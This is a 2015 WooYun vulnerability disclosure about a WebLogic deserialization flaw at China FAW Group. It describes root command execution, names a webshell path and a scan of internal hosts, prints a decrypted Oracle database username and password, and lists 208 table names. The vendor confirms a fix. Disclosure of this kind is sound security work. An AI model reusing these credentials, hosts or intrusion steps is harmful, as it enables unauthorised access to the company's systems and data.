当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166279

漏洞标题:中国第一汽车集团getshell侧漏208张数据表\内网十几台主机可深入

相关厂商:中国第一汽车集团公司

漏洞作者: 路人甲

提交时间:2015-12-31 09:46

修复时间:2016-01-28 14:13

公开时间:2016-01-28 14:13

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-01-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

20还是值得!

详细说明:

http://202.98.11.47:7001/
反序列化命令执行
ROOT权限

60.png


shadow

62.png


扫个内网

http://10.44.30.89 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.35 >> >>nginx >>Success
http://10.44.30.52 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.91 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.51 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.113 >> 一汽解放紧急救援调度系统-管理员登录>>Microsoft-IIS/6.0 >>Success
http://10.44.30.118 >> ��������������ƽ̨>>null >>Success
http://10.44.30.54 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.90 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.128 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.79 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.156 >> >>Microsoft-IIS/7.5 >>Success
http://10.44.30.76 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.70 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.213 >> >>Microsoft-IIS/6.0 >>Success


十几台内网机器可深入!
直接写shell拿下服务器
http://202.98.11.47:7001/uddiexplorer/jmxroot.jsp

63.png


数据库配置

<jdbc-driver-params>
    <url>jdbc:oracle:thin:@10.44.31.36:1521/orcl</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>jmt11g</value>
      </property>
    </properties>
    <password-encrypted>{AES}VL8QgmX37Ftk778QCOHcvg4VkiHArfcrx9hYKahpyXQ=</password-encrypted>
  </jdbc-driver-params>
  <jdbc-connection-pool-params>


解密
jmt11g
cdpvrr
208张数据表侧漏

64.png


所有数据库表

TABLE_NAME
VARCHAR2
CDP_SENDGOODS_BAK
CDP_SENDGOODSDETAIL_BAK
SMP_INV_OUTBILL_DETAILS_H0924
SMP_INV_OUTBILL_0924
SMP_INV_INBILL_H_0924
SMP_INV_INBILL_DETAILS_H_0924
SMP_INV_INVENTORY_0924
ERS_DBM_INVLOCATION_BAK
CDP_ABNORMAL
CDP_BOX
CDP_BOXDETAIL
CDP_BOXSEQ
CDP_CAMTESTD
CDP_CAMTESTM
CDP_INFOCOLLECTNO
CDP_ORDER
CDP_ORDERDETAIL
CDP_SENDGOODS
CDP_SENDGOODSDETAIL
CDP_SPARETEST
CPTEST
ERS_DBM_INVLOCATION
ERS_DBM_ITEMMASTER
ERS_DBM_ITEMTYPE
ERS_DBM_MANUCENTER
ERS_DBM_MOVETYPE
ERS_DBM_MTYPEANDUCASE
ERS_DBM_PERIOD
ERS_DBM_PROCESS
ERS_DBM_PRODUCTCLASS
ERS_DBM_PROTOUR
ERS_DBM_UNITS
ERS_DBM_WAREHOUSE
ERS_DBM_WHOUSEAGE
ERS_DBM_WHOUSEITYPE
ERS_DBM_WHOUSEUSER
ERS_DBM_WORKSTATION
ERS_INV_INBILL
ERS_INV_INBILLDETAIL
CDP_INBILLSCANRECD_INSERT
CDP_INBILLSCANRECD_BAK
JYTEST
CDP_INSPECTBILL
CDP_INSPECTBILLD
T_SYS_SEARCHHELP
T_SYS_SEARCHHELP_PARAM
T_SYS_USER
T_SYS_USER_ROLE
SMP_INV_OUTBILL_DETAILSBAK
CDP_IO_CDPTODRBS
CDP_INBILLSCANRECD
DRBS_CARNETMSG
DRBS_FIRMWAREANDTER
DRBS_IO_CDPTODRBS
DRBS_IO_CERTIFICATE
DRBS_IO_TDSTODRBS
DRBS_IO_TDSTODRBS_H
DRBS_OPERATORRANGE
DRBS_SALEANDOPERATOR
DRBS_TERFIRMWAREVER
DRBS_TERMESSAGE
T_SYS_ADMINDIVISION
T_SYS_BROWSELOG
T_SYS_COMPANY
T_SYS_LOOKUP
T_SYS_LOOKUP_DETAIL
T_SYS_MENU
T_SYS_MESSAGE
T_SYS_ORGANIZATION
T_SYS_PARAMETER
T_SYS_PERM
T_SYS_ROLE
T_SYS_ROLE_PERM
SMP_INV_SEQUENCE_INOUT_BAK
SMP_INV_SEQUENCE_DETAILS_BAK
ERS_INV_INVENTORY
ERS_INV_ITEMSEQUENCE
ERS_INV_LOCINVENTORY
ERS_INV_OUTBILL
ERS_INV_OUTBILLDETAIL
ERS_INV_SUMSEQUENCE
ERS_PUR_REGISTER
ERS_PUR_REGISTERDETAIL
ERS_QMS_FINISHCHECKBILL
ERS_SYS_AREA
ERS_SYS_BILL_SN
ERS_SYS_BILL_SN_DAYNO
ERS_SYS_BILL_SN_DEF
ERS_SYS_BLOBS
ERS_SYS_CITYS
ERS_SYS_COM
ERS_SYS_CUSTOM_QUERY
ERS_SYS_CUSTOM_QUERY_PARA
ERS_SYS_CUSTOM_QUERY_U_MODEL
ERS_SYS_CUSTOM_QUERY_U_RIGHT
ERS_SYS_DELCHECK
ERS_SYS_DEPARTMENT
ERS_SYS_LOGINS
ERS_SYS_LOOKUP_TYPES
ERS_SYS_LOOKUP_VALUES
ERS_SYS_MENUS
ERS_SYS_MESSAGE
ERS_SYS_PARAMETERS
ERS_SYS_PERIOD
ERS_SYS_PERMS
ERS_SYS_PROVINCES
ERS_SYS_ROLES
ERS_SYS_ROLE_PERMS
ERS_SYS_USERS
ERS_SYS_USERS_BACK
ERS_SYS_USERWAREHOUSE
ERS_SYS_USER_ROLES
ERS_SYS_WAREHOUSE
PRODUCTS_BASE
PRODUCT_CATEGORIES_BASE
PS_TXN
SMP_ADM_GOVCAR
SMP_ADM_TRIP
SMP_ADM_VOCATION
SMP_CAMASSIGN
SMP_CAMASSIGN_DETAIL
SMP_CAMCAR
SMP_CAMCARSON
SMP_CAMCAR_HISTORY
SMP_CAMCHARGESNOTREG
SMP_CAMCHARGESNOTREG_DETAIL
SMP_CAMCHARGESREGISTRATION
SMP_CAMCHARGESREG_DETAIL
SMP_CAMINSTALLBILL
SMP_CAMINSTALLBILLSON
SMP_CAMINSTALLBILL_H
SMP_CAMINSTALLMAINTNOTES
SMP_CAMSEALPASTE
SMP_CAMSEALPASTE_DETAIL
SMP_CAMSERVICEMAIN
SMP_CAMSERVICESON
SMP_CAMSEVICEREGMAIN
SMP_CAMSEVICEREGSON
SMP_CAMSHIFTRECORDS
SMP_CAMTELRECORD
SMP_CAMTEST
SMP_CAMTEST_H
SMP_CAMWAGONFACTORY
SMP_CAMWARRANTYPARS
SMP_CERTIFICATE
SMP_DBM_ASSEMBLYBILL
SMP_DBM_CAMCARCOLOR
SMP_DBM_CAMCARUSE
SMP_DBM_CAMCOMPANY
SMP_DBM_CUSTOMER
SMP_DBM_INSTALLPERSON
SMP_DBM_ITEMMASTER
SMP_DBM_ITEMQUOTA
SMP_DBM_PURCHASE
SMP_DBM_SUPPLIER
SMP_DBM_UPDATECARLOG
SMP_DBM_VERSION
SMP_DMP_ASSEMBLYTESTPRO
SMP_DMP_FAKEPOSITIONSTRATEGY
SMP_DMP_POSITIONSTRATEGY
SMP_FAKE_ITEMMASTER
SMP_FETCHBILLMAIN
SMP_FETCHBILLSON
SMP_INV_COLLARBILL_DETAILS
SMP_INV_COLLARUSEBILL
SMP_INV_INBILL
SMP_INV_INBILL_DETAILS
SMP_INV_INBILL_DETAILS_H
SMP_INV_INBILL_H
SMP_INV_INOUTBILLNO
SMP_INV_INVENTORY
SMP_INV_INVENTORY_H
SMP_INV_OUTBILL
SMP_INV_OUTBILL_DETAILS
SMP_INV_OUTBILL_DETAILS_H
SMP_INV_OUTBILL_H
SMP_INV_SEQUENCE_DETAILS
SMP_INV_SEQUENCE_INOUT
SMP_INV_SEQUENCE_INOUT_H
SMP_INV_SEQUENCE_INOUT_TEMP
SMP_INV_SIMATTRIBUTES
SMP_INV_SIMCOSTD
SMP_INV_SIMPRINT
SUPPLIERS
TEMP_ITEMMASTER
TESTDATE
T_SYS_DELCHECK
T_SYS_WORKFLOW
YFYS_DEPT
YFYS_PROJECT
CDP_JFWAREHOUSE
ERS_SYS_MESSAGE59
CDP_IO_CDPTODRBS_H
ERS_DBM_INVLOCATION_BAK1
CDP_INBILLSCANREC
YU_ABC
TEMP_USABLEQUA
TEMP_OUTBILL_D
TEMP_OUTBILL
TEMP_KQOUTBILL_D
TEMP_KQOUTBILL
TEMP_KQINBILL_D
TEMP_KQINBILL
TEMP_INVQUA
TEMP_INVENTORY
TEMP_INBILL_D
TEMP_INBILL
TEMP1

漏洞证明:

修复方案:

求20rank!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-04 10:43

厂商回复:

已经提交有关部门处理

最新状态:

2016-01-28:已修复